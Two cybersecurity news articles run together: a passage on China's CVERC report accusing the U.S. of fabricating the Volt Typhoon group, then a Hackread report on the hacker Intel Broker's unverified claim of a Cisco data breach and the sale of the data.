It's worth noting that a previous report published by CVERC in July characterized the Volt Typhoon as a misinformation campaign orchestrated by the U.S. intelligence agencies.

Volt Typhoon is the moniker assigned to a China-nexus cyber espionage group that's believed to be active since 2019, stealthily embedding itself into critical infrastructure networks by routing traffic through edge devices compromising routers, firewalls, and VPN hardware in an effort to blend in and fly under the radar.

As recently as late August 2024, it was linked to the zero-day exploitation of a high-severity security flaw impacting Versa Director (CVE-2024-39717, CVSS score: 6.6) to deliver a web shell named VersaMem for facilitating credential theft and run arbitrary code.

The use of edge devices by China-linked intrusion sets has become something of a pattern in recent years, with some campaigns leveraging them as Operational Relay Boxes (ORBs) to evade detection.

This is substantiated by a recent report published by French cybersecurity company Sekoia, which attributed threat actors likely of Chinese origin to a wide-range attack campaign that infects edge devices like routers and cameras to deploy backdoors such as GobRAT and Bulbature for follow-on attacks against targets of interest.

"Bulbature, an implant that was not yet documented in open source, seems to be only used to transform the compromised edge device into an ORB to relay attacks against final victims networks," the researchers said.

"This architecture, consisting of compromised edge devices acting as ORBs, allows an operator to carry out offensive cyber operations around the world near to the final targets and hide its location by creating on-demand proxies tunnels."

In the latest 59-page document, Chinese authorities said more than 50 security experts from the U.S., Europe, and Asia reached out to the CVERC, expressing concerns related to "the U.S. false narrative" about Volt Typhoon and the lack of evidence linking the threat actor to China.

The CVERC, however, did not name those experts, nor their reasons to back up the hypothesis. It further went on to state that the U.S. intelligence agencies created a stealthy toolkit dubbed Marble no later than 2015 with the intent to confuse attribution efforts.

"The toolkit is a tool framework that can be integrated with other cyber weapon development projects to assist cyber weapon developers in obfuscating various identifiable features in program code, effectively 'erasing' the 'fingerprints' of cyber weapon developers," it said.

"What's more, the framework has a more 'shameless' function to insert strings in other languages, such as Chinese, Russian, Korean, Persian, and Arabic, which is obviously intended to mislead investigators and frame China, Russia, North Korea, Iran, and Arab countries."

The report further takes the opportunity to accuse the U.S. of relying on its "innate technological advantages and geological advantages in the construction of the internet" to control fiber optic cables across the Atlantic and the Pacific and using them for "indiscriminate monitoring" of internet users worldwide.

It also alleged that companies like Microsoft and CrowdStrike have resorted to giving "absurd" monikers with "obvious geopolitical overtones" for threat activity groups with names like "typhoon," "panda," and "dragon."

"Again, we would like to call for extensive international collaboration in this field," it concluded. "Moreover, cybersecurity companies and research institutions should focus on counter-cyber threat technology research and better products and services for users."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China Accuses U.S. of Fabricating Volt Typhoon to Hide Its Own Hacking Campaigns

Intel Broker claims a major data breach at Cisco, allegedly stealing source codes, confidential documents, and credentials from…

Intel Broker claims a major data breach at Cisco, allegedly stealing source codes, confidential documents, and credentials from global firms like Verizon, AT&T, Microsoft, and more. Data is now for sale on Breach Forums.

Intel Broker, a hacker notorious for high-profile data breaches, is claiming to have breached the technology giant Cisco Systems, Inc. In a post on the cybercrime platform **Breach Forums**, the hacker stated that the breach enabled them to steal a massive amount of sensitive information from Cisco’s systems.

According to the hacker, the alleged data breach took place on October 10, 2024, while the Breach Forum post was published earlier today on October 14, 2024.

Intel Broker’s post (Screenshot: Hackread.com)

****What Was Allegedly Stolen?****

As seen by the Hackread.com research team, Intel Broker has listed a massive amount of data that was allegedly stolen in the breach, including:

*   **Source Code**: Projects from GitHub, GitLab, and SonarQube, critical to Cisco’s development efforts.
*   **Hard-Coded Credentials**: Sensitive information like login details embedded in source code.
*   **Certificates and Keys**: SSL certificates, and public and private keys crucial for secure communications.
*   **Confidential Documents**: Internal documents and information classified as “Cisco Confidential.”
*   **API Tokens and Storage Buckets**: AWS private buckets, Azure storage buckets, and API tokens that could be used to access critical systems.
*   **Other Sensitive Information**: Jira tickets, Docker builds, and Cisco premium products are also listed.

****Impact on Major Corporations****

Intel Broker also shared a list of companies whose production source codes were allegedly taken during the breach. The list includes several high-profile firms, particularly in the telecommunications and financial sectors, such as:

*   **Telecom Companies**: Verizon, AT&T (USA and Mexico), British Telecom, T-Mobile (USA and Poland), Vodafone (Albania and Australia), and Turkcell.
*   **Financial Institutions**: Bank of America, Barclays, and National Australian Bank.
*   **Tech and Health**: Microsoft, Liberty Global, and Dignity Health.

Sample documents shared by the hacker (Screenshot: Hackread.com)

****Data for Sale****

Intel Broker is offering the stolen data for sale in exchange for Monero (XMR), a cryptocurrency known for its privacy features. The hacker indicated that they are open to using a middleman to facilitate the transaction, ensuring **anonymity** for both the buyer and seller. This method is a common practice among cybercriminals to avoid detection and tracking by authorities.

****Unverified but Serious Claims****

At the time of writing, Hackread.com, which first spotted the hacker’s claims, has reached out to Cisco for comment, but no official response has been given. The breach, if confirmed, could have major consequences for Cisco and the affected companies, raising concerns about the extent of the damage and the potential exploitation of the compromised data.

****Intel Broker and Previous Breaches****

Intel Broker is known for high-profile data breaches. **In June 2024**, the hacker claimed to have breached Apple Inc., stealing source code for internal tools. The same hacker boasted about **breaching AMD** (Advanced Micro Devices, Inc.), and stealing employee and product information.

**In May 2024**, Intel Broker hacked Europol, a breach that the agency later confirmed. Some of the hacker’s previous data breaches are listed below:

*   **Tech in Asia**
*   **Space-Eyes**
*   **Home Depot**
*   **Facebook Marketplace**
*   **U.S. contractor Acuity Inc.**
*   **Staffing giant Robert Half**
*   **Los Angeles International Airport**
*   **Alleged breaches of HSBC and Barclays Bank**

Although the hacker’s origins and affiliates are unknown, according to the United States government, IntelBroker is alleged to be the perpetrator behind one of the **T-Mobile data breaches**.

Nevertheless, these claims regarding the Cisco data breach go on to show the cybersecurity risks faced even by large organizations. As more details emerge, the scale of this breach and its potential fallout will be closely watched.

1.  **Akira Ransomware Targets Businesses via Exploited CISCO VPNs**
2.  **Cisco Network Breach as Employee’s Google Account** **was** **Hacked**
3.  **Hackers Claim 10TB Breach at Russian Cybersecurity Firm Dr.Web**
4.  **Hackers leave US flag after targeting Cisco switches in Russia & Iran**
5.  **Ex-worker hacked Cisco AWS Infrastructure; erased virtual machines**

Tag

#intel